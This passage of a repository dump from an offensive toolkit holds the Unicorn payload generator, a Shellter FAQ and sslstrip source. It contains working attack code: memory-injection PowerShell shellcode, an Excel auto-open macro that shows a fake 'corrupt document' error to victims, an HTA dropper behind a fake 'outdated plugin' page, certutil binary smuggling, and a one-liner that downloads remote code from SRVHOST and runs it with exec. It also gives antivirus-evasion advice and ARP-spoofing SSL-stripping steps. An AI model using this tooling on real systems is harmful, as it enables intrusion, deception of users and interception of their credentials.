through powershell injection 91 | after that. 92 | 93 | NOTE: WHEN COPYING AND PASTING THE EXCEL, IF THERE ARE ADDITIONAL SPACES THAT ARE ADDED YOU NEED TO 94 | REMOVE THESE AFTER EACH OF THE POWERSHELL CODE SECTIONS UNDER VARIABLE "x" OR A SYNTAX ERROR WILL 95 | HAPPEN! 96 | 97 | [*******************************************************************************************************] 98 | 99 | """ 100 | 101 | 102 | # display hta help 103 | def hta_help(): 104 | print """ 105 | [*******************************************************************************************************] 106 | 107 | -----HTA ATTACK INSTRUCTIONS---- 108 | 109 | The HTA attack will automatically generate two files, the first the index.html which tells the browser to 110 | use Launcher.hta which contains the malicious powershell injection code. All files are exported to the 111 | hta_access/ folder and there will be three main files. The first is index.html, second Launcher.hta and the 112 | last, the unicorn.rc file. You can run msfconsole -r unicorn.rc to launch the listener for Metasploit. 113 | 114 | A user must click allow and accept when using the HTA attack in order for the powershell injection to work 115 | properly. 116 | 117 | [*******************************************************************************************************] 118 | 119 | """ 120 | 121 | 122 | # display powershell help 123 | def ps_help(): 124 | print """ 125 | [********************************************************************************************************] 126 | 127 | -----POWERSHELL ATTACK INSTRUCTIONS---- 128 | 129 | Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all 130 | of the code needed in order to inject the powershell attack into memory. Note you will need a place that 131 | supports remote command injection of some sort. Often times this could be through an excel/word doc or 132 | through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to 133 | where you can use this attack at. Simply paste the powershell_attacks.txt command in any command prompt 134 | window or where you have the ability to call the powershell executable and it will give a shell back to 135 | you. 136 | 137 | Note that you will need to have a listener enabled in order to capture the attack. 138 | 139 | [*******************************************************************************************************] 140 | """ 141 | 142 | 143 | # display cert help 144 | def cert_help(): 145 | print """ 146 | [*******************************************************************************************************] 147 | 148 | -----CERUTIL Attack Instruction---- 149 | 150 | The certutil attack vector was identified by Matthew Graeber (@mattifestation) which allows you to take 151 | a binary file, move it into a base64 format and use certutil on the victim machine to convert it back to 152 | a binary for you. This should work on virtually any system and allow you to transfer a binary to the victim 153 | machine through a fake certificate file. To use this attack, simply place an executable in the path of 154 | unicorn and run python unicorn.py crt in order to get the base64 output. Once that's finished, 155 | go to decode_attack/ folder which contains the files. The bat file is a command that can be run in a 156 | windows machine to convert it back to a binary. 157 | 158 | [*******************************************************************************************************] 159 | """ 160 | 161 | 162 | def custom_ps1_help(): 163 | print """ 164 | [*******************************************************************************************************] 165 | 166 | -----Custom PS1 Attack Instructions---- 167 | 168 | This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro. 169 | 170 | Note if choosing the macro option, a large ps1 file may exceed the amount of carriage returns allowed by 171 | VBA. You may change the number of characters in each VBA string by passing an integer as a parameter. 172 | 173 | Examples: 174 | 175 | python unicorn.py harmless.ps1 176 | python unicorn.py myfile.ps1 macro 177 | python unicorn.py muahahaha.ps1 macro 500 178 | 179 | The last one will use a 500 character string instead of the default 380, resulting in less carriage returns in VBA. 180 | 181 | [*******************************************************************************************************] 182 | """ 183 | 184 | 185 | # usage banner 186 | def gen_usage(): 187 | print "-------------------- Magic Unicorn Attack Vector v2.1.2-----------------------------" 188 | print "\nNative x86 powershell injection attacks on any Windows platform." 189 | print "Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)" 190 | print "Twitter: @TrustedSec, @HackingDave" 191 | print "Credits: Matthew Graeber, Justin Elze, Chris Gates" 192 | print "\nHappy Magic Unicorns." 193 | print "" 194 | print "Usage: python unicorn.py payload reverse_ipaddr port " 195 | print "PS Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443" 196 | print "Macro Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro" 197 | print "HTA Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta" 198 | print "CRT Example: python unicorn.py crt" 199 | print "Custom PS1 Example: python unicorn.py " 200 | print "Custom PS1 Example: python unicorn.py macro 500" 201 | print "Help Menu: python unicorn.py --help\n" 202 | 203 | 204 | # split string 205 | def split_str(s, length): 206 | return [s[i:i + length] for i in range(0, len(s), length)] 207 | 208 | 209 | # write a file to designated path 210 | def write_file(path, text): 211 | file_write = file(path, "w") 212 | file_write.write(text) 213 | file_write.close() 214 | 215 | 216 | # generate full macro 217 | def generate_macro(full_attack, line_length=380): 218 | # start of the macro 219 | macro_str = "Sub Auto_Open()\nDim x\nx = " 220 | 221 | if line_length is None: 222 | line_length_int = 380 223 | else: 224 | line_length_int = int(line_length) 225 | 226 | powershell_command_list = split_str(full_attack, line_length_int) 227 | 228 | for line in powershell_command_list: 229 | macro_str += "& \"" + line + "\" _\n" 230 | 231 | # remove trailing "_ \r\n" 232 | macro_str = macro_str[:-4] 233 | # remove first occurrence of & 234 | macro_str = macro_str.replace("& ", "", 1) 235 | 236 | # end of macro 237 | macro_str += """"\nShell ("POWERSHELL.EXE " & x)\nDim title As String\ntitle = "Critical Microsoft Office Error"\nDim msg As String\nDim intResponse As Integer\nmsg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."\nintResponse = MsgBox(msg, 16, title)\nApplication.Quit\nEnd Sub""" 238 | return macro_str 239 | 240 | 241 | # generate Matthew Graeber's (Matt rocks) attack for binary to cert format - https://gist.github.com/mattifestation/47f9e8a431f96a266522 242 | def gen_cert_attack(filename): 243 | if os.path.isfile(filename): 244 | # make sure the directory is made 245 | if not os.path.isdir("decode_attack"): 246 | os.makedirs("decode_attack") 247 | 248 | # remove old files here 249 | if os.path.isfile("decode_attack/encoded_attack.crt"): 250 | os.remove("decode_attack/encoded_attack.crt") 251 | 252 | print "[*] Importing in binary file to base64 encode it for certutil prep." 253 | data = file(filename, "rb").read() 254 | data = base64.b64encode(data) 255 | print "[*] Writing out the file to decode_attack/encoded_attack.crt" 256 | write_file("decode_attack/encoded_attack.crt", 257 | "-----BEGIN CERTIFICATE-----\n{0}\n-----END CERTIFICATE-----".format(data)) 258 | print "[*] Filewrite complete, writing out decode string for you.." 259 | write_file("decode_attack/decode_command.bat", "certutil -decode encoded_attack.crt encoded.exe") 260 | print "[*] Exported attack under decode_attack/" 261 | print "[*] There are two files, encoded_attack.crt contains your encoded data" 262 | print "[*] The second file, decode_command.bat will decode the cert to an executable." 263 | else: 264 | print "[!] File was not found. Exiting the unicorn attack." 265 | sys.exit() 266 | 267 | # generate HTA attack method 268 | 269 | 270 | def gen_hta_attack(command): 271 | # HTA code here 272 | main1 = """""" % command 273 | main2 = """outdated plugin
Please wait redirecting to download...""" 274 | 275 | # make a directory if its not there 276 | if not os.path.isdir("hta_attack"): os.makedirs("hta_attack") 277 | 278 | # write out index file 279 | print "[*] Writing out index file to hta_attack/index.html" 280 | write_file("hta_attack/index.html", main2) 281 | 282 | # write out Launcher.hta 283 | print "[*] Writing malicious hta launcher hta_attack/Launcher.hta" 284 | write_file("hta_attack/Launcher.hta", main1) 285 | 286 | 287 | # generate the actual shellcode through msf 288 | def generate_shellcode(payload, ipaddr, port): 289 | print "[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode..." 290 | port = port.replace("LPORT=", "") 291 | proc = subprocess.Popen( 292 | "msfvenom -p %s LHOST=%s LPORT=%s StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 --platform windows --smallest -f c" % ( 293 | payload, ipaddr, port), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) 294 | data = proc.communicate()[0] 295 | # start to format this a bit to get it ready 296 | repls = {';': '', ' ': '', '+': '', '"': '', '\n': '', 'buf=': '', 'Found 0 compatible encoders': '', 297 | 'unsignedcharbuf[]=': ''} 298 | data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip() 299 | return data 300 | 301 | 302 | # generate shellcode attack and replace hex 303 | def gen_shellcode_attack(payload, ipaddr, port): 304 | # regular payload generation stuff 305 | # generate our shellcode first 306 | shellcode = generate_shellcode(payload, ipaddr, port).rstrip() 307 | # sub in \x for 0x 308 | shellcode = re.sub("\\\\x", "0x", shellcode) 309 | # base counter 310 | counter = 0 311 | # count every four characters then trigger floater and write out data 312 | floater = "" 313 | # ultimate string 314 | newdata = "" 315 | for line in shellcode: 316 | floater += line 317 | counter += 1 318 | if counter == 4: 319 | newdata = newdata + floater + "," 320 | floater = "" 321 | counter = 0 322 | 323 | # here's our shellcode prepped and ready to go 324 | shellcode = newdata[:-1] 325 | 326 | # write out rc file 327 | write_file("unicorn.rc", 328 | "use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n" % ( 329 | payload, ipaddr, port)) 330 | 331 | # one line shellcode injection with native x86 shellcode 332 | powershell_code = ( 333 | r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$2 = "-enc ";if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2 $e"}else{;iex "& powershell $2 $e";}""" % shellcode) 334 | return powershell_code 335 | 336 | 337 | def gen_ps1_attack(ps1path): 338 | if os.path.isfile(ps1path): 339 | with open(ps1path, 'r') as scriptfile: 340 | data = scriptfile.read() 341 | return data 342 | else: 343 | print "[!] {0} does not exist. Please check your path".format(ps1path) 344 | sys.exit(1) 345 | 346 | 347 | def format_payload(powershell_code, attack_type, attack_modifier, option): 348 | gen_unicorn() 349 | print "Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)" 350 | print "Twitter: @TrustedSec, @HackingDave" 351 | print "\nHappy Magic Unicorns." 352 | 353 | full_attack = "powershell -window hidden -enc " + base64.b64encode(powershell_code.encode('utf_16_le')) 354 | 355 | if attack_type == "msf": 356 | if attack_modifier == "macro": 357 | macro_attack = generate_macro(full_attack) 358 | write_file("powershell_attack.txt", macro_attack) 359 | macro_help() 360 | 361 | elif attack_modifier == "hta": 362 | gen_hta_attack(full_attack) 363 | shutil.move("unicorn.rc", "hta_attack/") # move unicorn to hta attack if hta specified 364 | hta_help() 365 | 366 | else: # write out powershell attacks 367 | write_file("powershell_attack.txt", full_attack) 368 | ps_help() 369 | 370 | elif attack_type == "custom_ps1": 371 | if attack_modifier == "macro": 372 | macro_attack = generate_macro(full_attack, option) 373 | write_file("powershell_attack.txt", macro_attack) 374 | else: 375 | write_file("powershell_attack.txt", full_attack) 376 | 377 | custom_ps1_help() 378 | 379 | else: 380 | write_file("powershell_attack.txt", full_attack) 381 | ps_help() 382 | 383 | # Print completion messages 384 | if attack_type == "msf" and attack_modifier == "hta": 385 | print "[*] Exported index.html, Launcher.hta, and unicorn.rc under hta_attack/." 386 | print "[*] Run msfconosle -r unicorn.rc to launch listener and move index and launcher to web server.\n" 387 | 388 | elif attack_type == "msf": 389 | print "[*] Exported powershell output code to powershell_attack.txt." 390 | print "[*] Exported Metasploit RC file as unicorn.rc. Run msfconsole -r unicorn.rc to execute and create listener.\n" 391 | 392 | elif attack_type == "custom_ps1": 393 | print "[*] Exported powershell output code to powershell_attack.txt" 394 | 395 | 396 | # pull the variables needed for usage 397 | try: 398 | attack_type = "" 399 | attack_modifier = "" 400 | payload = "" 401 | ps1path = "" 402 | 403 | if len(sys.argv) > 1: 404 | if sys.argv[1] == "--help": 405 | ps_help() 406 | macro_help() 407 | hta_help() 408 | cert_help() 409 | custom_ps1_help() 410 | gen_usage() 411 | sys.exit() 412 | else: 413 | if len(sys.argv) > 2 and sys.argv[2] == "crt": 414 | attack_type = "crt" 415 | payload = sys.argv[1] 416 | elif re.search('\.ps1$', sys.argv[1]) is not None: 417 | attack_type = "custom_ps1" 418 | ps1path = sys.argv[1] 419 | else: 420 | attack_type = "msf" 421 | payload = sys.argv[1] 422 | 423 | # if we are using macros 424 | if len(sys.argv) == 5: 425 | if attack_type == "msf": # msf macro attack 426 | ipaddr = sys.argv[2] 427 | port = sys.argv[3] 428 | attack_modifier = sys.argv[4] 429 | ps = gen_shellcode_attack(payload, ipaddr, port) 430 | else: 431 | print "[!] Options not understood or missing. Use --help switch for assistance." 432 | sys.exit(1) 433 | 434 | format_payload(ps, attack_type, attack_modifier, None) 435 | 436 | # default unicorn & custom ps1 macro attacks 437 | elif len(sys.argv) == 4: 438 | if attack_type == "custom_ps1": # custom ps1 macro attack 439 | attack_modifier = sys.argv[2] 440 | option = sys.argv[3] 441 | ps = gen_ps1_attack(ps1path) 442 | elif attack_type == "msf": 443 | payload = sys.argv[1] 444 | ipaddr = sys.argv[2] 445 | port = sys.argv[3] 446 | attack_modifier = "" 447 | option = None 448 | ps = gen_shellcode_attack(payload, ipaddr, port) 449 | # It should not be possible to get here, but just in case it does for some reason in the future, it will 450 | # prevent usage of 'ps' and 'option', causing the app to crash 451 | else: 452 | print "[!] Something went way wrong while generating payload." 453 | sys.exit() 454 | 455 | format_payload(ps, attack_type, attack_modifier, option) 456 | 457 | elif len(sys.argv) == 3: 458 | # Matthews base64 cert attack 459 | if attack_type == "crt": 460 | cert_help() 461 | # generate the attack vector 462 | gen_cert_attack(payload) 463 | elif attack_type == "custom_ps1": 464 | attack_modifier = sys.argv[2] 465 | ps = gen_ps1_attack(ps1path) 466 | format_payload(ps, attack_type, attack_modifier, None) 467 | else: 468 | print "[!] Options not understood or missing. Use --help switch for assistance." 469 | sys.exit() 470 | 471 | elif len(sys.argv) == 2: 472 | if attack_type == "custom_ps1": 473 | ps = gen_ps1_attack(ps1path) 474 | format_payload(ps, attack_type, None, None) 475 | else: 476 | print "[!] Options not understood or missing. Use --help switch for assistance." 477 | sys.exit() 478 | 479 | # if we did supply parameters 480 | elif len(sys.argv) < 2: 481 | gen_unicorn() 482 | gen_usage() 483 | 484 | except Exception, e: 485 | print "[!] Something went wrong, printing the error: " + str(e) 486 | 487 | -------------------------------------------------------------------------------- /modules/update.txt: -------------------------------------------------------------------------------- 1 | 4.6 2 | -------------------------------------------------------------------------------- /modules/web_delivery.bat: -------------------------------------------------------------------------------- 1 | :: COPY/PASTE THE COMMAND PROVIDED BY 'web_delivery' MSF MODULE, and delete this line befor saving the file/close document... 2 | 3 | -------------------------------------------------------------------------------- /modules/web_delivery.py: -------------------------------------------------------------------------------- 1 | python -c "import urllib2; r = urllib2.urlopen('http://SRVHOST:8080/a'); exec(r.read());" 2 | -------------------------------------------------------------------------------- /priv8/.set: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/priv8/.set -------------------------------------------------------------------------------- /priv8/handler/.set: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/priv8/handler/.set -------------------------------------------------------------------------------- /shellter/faq.txt: -------------------------------------------------------------------------------- 1 | 2 | 1) Does the execution flow return to normal after executing the payload? 3 | ========================================================================= 4 | 5 | Shellter V (v5.0) introduces the Stealth Mode feature which preserves the 6 | original functionality of the application while it keeps all the benefits 7 | of dynamic PE infection. 8 | 9 | As mentioned also below, when you use the Stealth Mode feature you need to 10 | set the payload exit function to 'Thread', when you prepare the multi-handler 11 | listener in metasploit, otherwise the process will be terminated when you kill 12 | the session. 13 | 14 | For more information on how to use Stealth Mode effectively, please read the 15 | readme.txt document. 16 | 17 | 18 | 19 | 2) Does the process die after the payload is executed? 20 | ======================================================= 21 | 22 | This actually depends on how the payload behaves. 23 | 24 | If you use the Stealth Mode feature, then you must always set the exit 25 | function for the payload to 'Thread' so that it won't kill the process 26 | when it returns. In this case the process will still run. 27 | 28 | If you don't use the Stealth Mode feature, then if the exit function is 29 | set to 'Process', the payload will kill the process, otherwise the program 30 | will most probably crash. 31 | Keep in mind that this will happen after the execution of the payload, or 32 | after killing the reverse connection, so in any case this doesn't affect 33 | the effectiveness of the injected code. 34 | 35 | For more information on how to use Stealth Mode effectively, please read the 36 | readme.txt document. 37 | 38 | 39 | 40 | 3) How long does it take to execute the payload? 41 | ================================================= 42 | 43 | Normally, this happens instantly, unless you have injected into a point in 44 | the execution flow that requires user interaction with the application in order 45 | to be reached. 46 | 47 | Furthermore, when junk polymorphic code is used then this delays the execution 48 | of the payload. In Stealth Mode the delay is not significant. 49 | However, when Stealth Mode is not used the execution of the effective payload 50 | can be delayed by several seconds. 51 | 52 | This delay is good in order to bypass AV emulation engines and sandboxes that 53 | normally only monitor the process for a limited time. You don't have to use 54 | this feature if you don't want to. However, it can significantly contribute 55 | towards AV evasion. -------------------------------------------------------------------------------- /shellter/icon/shellter.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/shellter/icon/shellter.ico -------------------------------------------------------------------------------- /shellter/license.txt: -------------------------------------------------------------------------------- 1 | License Agreement 2 | ==================== 3 | 4 | By using this software you understand that it has been exclusively developed 5 | by Kyriakos Economou (@kyREcon) during his free time and his past, current or 6 | future employers may assume no prior knowledge of existence for it. 7 | 8 | This software makes use of the BeaEngine Disassemble library 9 | (http://www.beaengine.org) as stated in the readme.txt file. 10 | 11 | 12 | This license was updated the 18th of May 2015. 13 | 14 | 15 | 16 | 17 | Terms of Use 18 | ============== 19 | 20 | 21 | 1) You can use this software and share it with anyone as long as you do this 22 | for free. 23 | 24 | 2) You assume full responsibility for any damage caused by this software either 25 | this applies to you or to someone else. 26 | 27 | 3) You assume full responsibility for any unlawful actions taken by using this 28 | software. 29 | 30 | 4) You are allowed to modify this software, but if you do then you have to 31 | explicitly state so in case you share it with other people. 32 | 33 | 5) You are allowed to reverse engineer it, disassemble it, debug it, for any 34 | reason that might be, but in case you find a bug then please report it to 35 | the author and give him the necessary amount of time to fix it before 36 | disclosing it. 37 | 38 | 6) You are allowed to distribute this software from your own website, but if 39 | you do then you have to include a link to its original source along with 40 | the license agreement. 41 | 42 | 7) You are allowed to use this software for work purposes, but you are not 43 | allowed to charge for it. 44 | This means that you have the right to use it as a complementary tool to 45 | assist you at work, but you are not allowed to build a commercial service 46 | based on this tool or exploit this tool financially by any means without 47 | the written agreement of its author. 48 | 49 | 8) You are not allowed to use this software to gain unauthorized access to a 50 | computer system or network without a written agreement of its owner. 51 | 52 | 9) It is responsibility of the user to check for any modifications in this 53 | license agreement, and adjust the way he is using this software accordingly. 54 | 55 | 10) You are allowed to use this software for as long as you want only if you 56 | respect all the previous terms. 57 | 58 | 59 | Good luck! 60 | 61 | kyREcon -------------------------------------------------------------------------------- /shellter/shellcode_samples/calc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/shellter/shellcode_samples/calc -------------------------------------------------------------------------------- /shellter/shellcode_samples/calcenc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/shellter/shellcode_samples/calcenc -------------------------------------------------------------------------------- /shellter/shellcode_samples/info.txt: -------------------------------------------------------------------------------- 1 | These are set to kill the process after execution, so don't use them to evaluate Stealth Mode. 2 | 3 | 4 | calc: Launch Calc.exe - No Encoding 5 | 6 | calcenc : Launch Calc.exe - Custom Encoding 7 | 8 | krb1: Launch Calc.exe - Metasploit Single Encoding 9 | 10 | krb3 : Launch Calc.exe - Metasploit Triple Encoding -------------------------------------------------------------------------------- /shellter/shellcode_samples/krb1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/shellter/shellcode_samples/krb1 -------------------------------------------------------------------------------- /shellter/shellcode_samples/krb3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/shellter/shellcode_samples/krb3 -------------------------------------------------------------------------------- /shellter/shellter.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/shellter/shellter.exe -------------------------------------------------------------------------------- /sslstrip-0.9/README: -------------------------------------------------------------------------------- 1 | sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 2 | attacks. 3 | 4 | It requires Python 2.5 or newer, along with the 'twisted' python module. 5 | 6 | Installing: 7 | * Unpack: tar zxvf sslstrip-0.5.tar.gz 8 | * Install twisted: sudo apt-get install python-twisted-web 9 | * (Optionally) run 'python setup.py install' as root to install, 10 | or you can just run it out of the directory. 11 | 12 | Running: 13 | sslstrip can be run from the source base without installation. 14 | Just run 'python sslstrip.py -h' as a non-root user to get the 15 | command-line options. 16 | 17 | The four steps to getting this working (assuming you're running Linux) 18 | are: 19 | 20 | 1) Flip your machine into forwarding mode (as root): 21 | echo "1" > /proc/sys/net/ipv4/ip_forward 22 | 23 | 2) Setup iptables to intercept HTTP requests (as root): 24 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 25 | 26 | 3) Run sslstrip with the command-line options you'd like (see above). 27 | 28 | 4) Run arpspoof to redirect traffic to your machine (as root): 29 | arpspoof -i -t 30 | 31 | More Info: 32 | http://www.thoughtcrime.org/software/sslstrip/ 33 | -------------------------------------------------------------------------------- /sslstrip-0.9/lock.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/lock.ico -------------------------------------------------------------------------------- /sslstrip-0.9/setup.py: -------------------------------------------------------------------------------- 1 | import sys, os, shutil 2 | from distutils.core import setup, Extension 3 | 4 | 5 | shutil.copyfile("sslstrip.py", "sslstrip/sslstrip") 6 | 7 | setup (name = 'sslstrip', 8 | version = '0.9', 9 | description = 'A MITM tool that implements Moxie Marlinspike\'s HTTPS stripping attacks.', 10 | author = 'Moxie Marlinspike', 11 | author_email = 'moxie@thoughtcrime.org', 12 | url = 'http://www.thoughtcrime.org/software/sslstrip/', 13 | license = 'GPL', 14 | packages = ["sslstrip"], 15 | package_dir = {'sslstrip' : 'sslstrip/'}, 16 | scripts = ['sslstrip/sslstrip'], 17 | data_files = [('share/sslstrip', ['README', 'COPYING', 'lock.ico'])], 18 | ) 19 | 20 | print "Cleaning up..." 21 | try: 22 | removeall("build/") 23 | os.rmdir("build/") 24 | except: 25 | pass 26 | 27 | try: 28 | os.remove("sslstrip/sslstrip") 29 | except: 30 | pass 31 | 32 | def capture(cmd): 33 | return os.popen(cmd).read().strip() 34 | 35 | def removeall(path): 36 | if not os.path.isdir(path): 37 | return 38 | 39 | files=os.listdir(path) 40 | 41 | for x in files: 42 | fullpath=os.path.join(path, x) 43 | if os.path.isfile(fullpath): 44 | f=os.remove 45 | rmgeneric(fullpath, f) 46 | elif os.path.isdir(fullpath): 47 | removeall(fullpath) 48 | f=os.rmdir 49 | rmgeneric(fullpath, f) 50 | 51 | def rmgeneric(path, __func__): 52 | try: 53 | __func__(path) 54 | except OSError, (errno, strerror): 55 | pass 56 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.""" 4 | 5 | __author__ = "Moxie Marlinspike" 6 | __email__ = "moxie@thoughtcrime.org" 7 | __license__= """ 8 | Copyright (c) 2004-2009 Moxie Marlinspike 9 | 10 | This program is free software; you can redistribute it and/or 11 | modify it under the terms of the GNU General Public License as 12 | published by the Free Software Foundation; either version 3 of the 13 | License, or (at your option) any later version. 14 | 15 | This program is distributed in the hope that it will be useful, but 16 | WITHOUT ANY WARRANTY; without even the implied warranty of 17 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 18 | General Public License for more details. 19 | 20 | You should have received a copy of the GNU General Public License 21 | along with this program; if not, write to the Free Software 22 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 23 | USA 24 | 25 | """ 26 | 27 | from twisted.web import http 28 | from twisted.internet import reactor 29 | 30 | from sslstrip.StrippingProxy import StrippingProxy 31 | from sslstrip.URLMonitor import URLMonitor 32 | from sslstrip.CookieCleaner import CookieCleaner 33 | 34 | import sys, getopt, logging, traceback, string, os 35 | 36 | gVersion = "0.9" 37 | 38 | def usage(): 39 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike" 40 | print "Usage: sslstrip \n" 41 | print "Options:" 42 | print "-w , --write= Specify file to log to (optional)." 43 | print "-p , --post Log only SSL POSTs. (default)" 44 | print "-s , --ssl Log all SSL traffic to and from server." 45 | print "-a , --all Log all SSL and HTTP traffic to and from server." 46 | print "-l , --listen= Port to listen on (default 10000)." 47 | print "-f , --favicon Substitute a lock favicon on secure requests." 48 | print "-k , --killsessions Kill sessions in progress." 49 | print "-h Print this help message." 50 | print "" 51 | 52 | def parseOptions(argv): 53 | logFile = 'sslstrip.log' 54 | logLevel = logging.WARNING 55 | listenPort = 10000 56 | spoofFavicon = False 57 | killSessions = False 58 | 59 | try: 60 | opts, args = getopt.getopt(argv, "hw:l:psafk", 61 | ["help", "write=", "post", "ssl", "all", "listen=", 62 | "favicon", "killsessions"]) 63 | 64 | for opt, arg in opts: 65 | if opt in ("-h", "--help"): 66 | usage() 67 | sys.exit() 68 | elif opt in ("-w", "--write"): 69 | logFile = arg 70 | elif opt in ("-p", "--post"): 71 | logLevel = logging.WARNING 72 | elif opt in ("-s", "--ssl"): 73 | logLevel = logging.INFO 74 | elif opt in ("-a", "--all"): 75 | logLevel = logging.DEBUG 76 | elif opt in ("-l", "--listen"): 77 | listenPort = arg 78 | elif opt in ("-f", "--favicon"): 79 | spoofFavicon = True 80 | elif opt in ("-k", "--killsessions"): 81 | killSessions = True 82 | 83 | return (logFile, logLevel, listenPort, spoofFavicon, killSessions) 84 | 85 | except getopt.GetoptError: 86 | usage() 87 | sys.exit(2) 88 | 89 | def main(argv): 90 | (logFile, logLevel, listenPort, spoofFavicon, killSessions) = parseOptions(argv) 91 | 92 | logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s', 93 | filename=logFile, filemode='w') 94 | 95 | URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon) 96 | CookieCleaner.getInstance().setEnabled(killSessions) 97 | 98 | strippingFactory = http.HTTPFactory(timeout=10) 99 | strippingFactory.protocol = StrippingProxy 100 | 101 | reactor.listenTCP(int(listenPort), strippingFactory) 102 | 103 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike running..." 104 | 105 | reactor.run() 106 | 107 | if __name__ == '__main__': 108 | main(sys.argv[1:]) 109 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/ClientRequest.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import urlparse, logging, os, sys, random 20 | 21 | from twisted.web.http import Request 22 | from twisted.web.http import HTTPChannel 23 | from twisted.web.http import HTTPClient 24 | 25 | from twisted.internet import ssl 26 | from twisted.internet import defer 27 | from twisted.internet import reactor 28 | from twisted.internet.protocol import ClientFactory 29 | 30 | from ServerConnectionFactory import ServerConnectionFactory 31 | from ServerConnection import ServerConnection 32 | from SSLServerConnection import SSLServerConnection 33 | from URLMonitor import URLMonitor 34 | from CookieCleaner import CookieCleaner 35 | from DnsCache import DnsCache 36 | 37 | class ClientRequest(Request): 38 | 39 | ''' This class represents incoming client requests and is essentially where 40 | the magic begins. Here we remove the client headers we dont like, and then 41 | respond with either favicon spoofing, session denial, or proxy through HTTP 42 | or SSL to the server. 43 | ''' 44 | 45 | def __init__(self, channel, queued, reactor=reactor): 46 | Request.__init__(self, channel, queued) 47 | self.reactor = reactor 48 | self.urlMonitor = URLMonitor.getInstance() 49 | self.cookieCleaner = CookieCleaner.getInstance() 50 | self.dnsCache = DnsCache.getInstance() 51 | # self.uniqueId = random.randint(0, 10000) 52 | 53 | def cleanHeaders(self): 54 | headers = self.getAllHeaders().copy() 55 | 56 | if 'accept-encoding' in headers: 57 | del headers['accept-encoding'] 58 | 59 | if 'if-modified-since' in headers: 60 | del headers['if-modified-since'] 61 | 62 | if 'cache-control' in headers: 63 | del headers['cache-control'] 64 | 65 | return headers 66 | 67 | def 